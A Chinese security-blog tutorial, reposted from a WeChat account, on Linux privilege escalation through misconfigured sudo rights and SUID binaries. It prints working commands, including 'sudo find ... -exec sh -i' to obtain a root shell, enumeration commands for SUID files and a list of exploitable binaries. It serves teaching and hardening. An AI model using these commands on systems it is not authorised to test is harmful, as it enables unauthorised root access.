sudo配置错误提权
为了方便普通用户,管理员可能会允许用户通过sudo运行一部分命令,这种情况很有可能会引入漏洞导致权限提升。比较典型的案例有将sudo权限分配给find命令,以便于普通用户能够查询相关文件。由于find命令包含执行命令的参数,因此可导致攻击者使用普通用户通过sudo执行find命令来获取root特权。
前提:当前普通用户能够通过sudo执行find命令
第一步:查看当前普通用户能够通过sudo执行哪些命令
通过执行sudo –l可以看到anan这个用户是具有find命令的执行权限的
第二步:通过sudo执行find命令获取root权限
sudo find /home -exec sh -i ;
注解:find命令的-exec参数用于跟command命令
Suid提权
Suid简介
1.只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.
3.命令执行者在执行该程序时获得该程序文件属主的身份.
4.SUID权限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效
示例:
命令:chmod u+s /usr/bin/find
常见的可用来提权的Linux可执行文件有:
Namp、vim、find、bash、more、less、nano、cp
查看可以suid提权的可执行文件的命令
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
find / -user root -perm -4000 -print 2>/dev/null
利用bash进行suid提权
执行find / -perm -u=s -type f 2>/dev/null,查看可以suid提前的可执行文件
利用find进行suid提权
执行find / -perm -u=s -type f 2>/dev/null,查看可以suid提前的可执行文件
使用find /home/test –exec whoami ;命令提权执行whoami命令
本文始发于微信公众号(小白学IT):sudo配置错误提权与suid提权
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
https://cn-sec.com/archives/453510.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论